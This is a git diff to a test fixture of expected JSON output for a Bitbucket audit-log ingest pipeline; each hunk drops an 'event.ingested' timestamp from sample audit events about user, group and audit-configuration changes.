diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
index 2d3d373833d..1e5c176fedc 100644
--- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
+++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json
@@ -50,7 +50,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userdeleted", - "ingested": "2021-12-24T00:37:18.867678106Z", "original": "{\"timestamp\":\"2021-11-27T17:38:58.087Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userdeleted\",\"action\":\"User deleted\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test.user\"}]}", "type": [ "user",
@@ -137,7 +136,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.userrenamed", - "ingested": "2021-12-24T00:37:18.867681776Z", "original": "{\"timestamp\":\"2021-11-27T17:38:53.360Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.userrenamed\",\"action\":\"Username changed\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"bitbucket.service.user.audit.attribute.user.name\",\"from\":\"test\",\"to\":\"test.user\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"oldUsername\\\":\\\"test\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test.user\"}]}", "type": [ "user", 
@@ -213,7 +211,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:18.867682876Z", "original": "{\"timestamp\":\"2021-11-27T17:38:42.151Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"action\":\"User password changed\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test\"}]}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", @@ -289,7 +286,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupdeleted", - "ingested": "2021-12-24T00:37:18.867683789Z", "original": "{\"timestamp\":\"2021-11-27T17:38:29.423Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupdeleted\",\"action\":\"User group deleted\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", 
@@ -379,7 +375,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipdeleted", - "ingested": "2021-12-24T00:37:18.867684796Z", "original": "{\"timestamp\":\"2021-11-27T17:38:23.209Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipdeleted\",\"action\":\"User deleted from user group\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"asdf\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":\\\"test\\\",\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", 
@@ -473,7 +468,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867685811Z", "original": "{\"timestamp\":\"2021-11-27T17:38:16.687Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"asdf\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", 
@@ -551,7 +545,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:18.867686790Z", "original": "{\"timestamp\":\"2021-11-27T17:38:04.808Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"action\":\"User group created\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=asdf\",\"id\":\"asdf\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"asdf\"}]}", "type": [ "group", 
@@ -641,7 +634,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:18.867687921Z", "original": "{\"timestamp\":\"2021-11-27T17:36:40.692Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"action\":\"User added to user group\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"},{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"name\":\"Parent group\",\"value\":\"stash-users\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"entities\\\":[\\\"test\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", 
@@ -719,7 +711,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.usercreated", - "ingested": "2021-12-24T00:37:18.867688854Z", "original": "{\"timestamp\":\"2021-11-27T17:36:40.674Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercreated\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"USER\",\"id\":\"3\"}],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"test\"}]}", "type": [ "user", 
@@ -799,7 +790,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867689840Z", "original": "{\"timestamp\":\"2021-11-27T17:36:19.269Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 66\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"66\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:18.849Z\"}]}", "type": "info", "kind": "event" 
@@ -869,7 +859,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867690735Z", "original": "{\"timestamp\":\"2021-11-27T17:36:18.873Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"67 - 166\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:18.850Z - 2021-11-27T17:36:18.370Z\"}]}", "type": "info", "kind": "event" 
@@ -925,7 +914,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867691785Z", "original": "{\"timestamp\":\"2021-11-27T17:36:18.370Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -988,7 +976,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867692688Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"security : base\",\"to\":\"security : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1051,7 +1038,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867693817Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"permissions : base\",\"to\":\"permissions : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1114,7 +1100,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867694856Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"ecosystem : base\",\"to\":\"ecosystem : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1177,7 +1162,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867695858Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"local_config_and_administration : base\",\"to\":\"local_config_and_administration : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1240,7 +1224,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867696948Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.994Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"user_management : base\",\"to\":\"user_management : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1303,7 +1286,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867697899Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.993Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"end_user_activity : base\",\"to\":\"end_user_activity : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1366,7 +1348,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:37:18.867698861Z", "original": "{\"timestamp\":\"2021-11-27T17:36:17.991Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Coverage Level\",\"i18nKey\":\"atlassian.audit.event.change.coverage.level\",\"from\":\"global_config_and_administration : base\",\"to\":\"global_config_and_administration : full\"}],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -1442,7 +1423,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867699767Z", "original": "{\"timestamp\":\"2021-11-27T17:35:46.331Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 56\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"56\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:12.363Z\"}]}", "type": "info", "kind": "event" 
@@ -1512,7 +1492,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867700690Z", "original": "{\"timestamp\":\"2021-11-27T17:35:45.810Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"57 - 156\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:12.364Z - 2021-11-27T17:35:33.093Z\"}]}", "type": "info", "kind": "event" 
@@ -1582,7 +1561,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867701587Z", "original": "{\"timestamp\":\"2021-11-27T17:35:33.093Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 54\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"54\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:11.102Z\"}]}", "type": "info", "kind": "event" 
@@ -1652,7 +1630,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:18.867702596Z", "original": "{\"timestamp\":\"2021-11-27T17:35:31.362Z\",\"author\":{\"name\":\"admin\",\"type\":\"NORMAL\",\"id\":\"2\",\"uri\":\"http://bitbucket.internal:7990/users/admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.73.5\",\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"55 - 154\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-27T17:29:11.242Z - 2021-11-27T17:35:11.898Z\"}]}", "type": "info", "kind": "event" 
@@ -1683,7 +1660,6 @@ }, "event": { "action": "bitbucket.search.audit.action.elasticsearchconfigurationchange", - "ingested": "2021-12-24T00:37:18.867703763Z", "original": "{\"timestamp\":\"2021-11-27T17:35:11.898Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.search.audit.action.elasticsearchconfigurationchange\",\"action\":\"Elasticsearch settings changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"bitbucket.search.audit.changedvalue.elasticsearchconfigurationchange.username\",\"to\":\"bitbucket\"}],\"system\":\"http://bitbucket.internal:7990\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"changed\\\":\\\",elasticsearchPasswordelasticsearchUsername\\\",\\\"username\\\":\\\"bitbucket\\\"}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Elasticsearch\"}]}", "type": "info", "kind": "event" 
@@ -1774,7 +1750,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.applicationsetup", - "ingested": "2021-12-24T00:37:18.867704718Z", "original": "{\"timestamp\":\"2021-11-27T17:34:26.112Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.applicationsetup\",\"action\":\"Instance setup 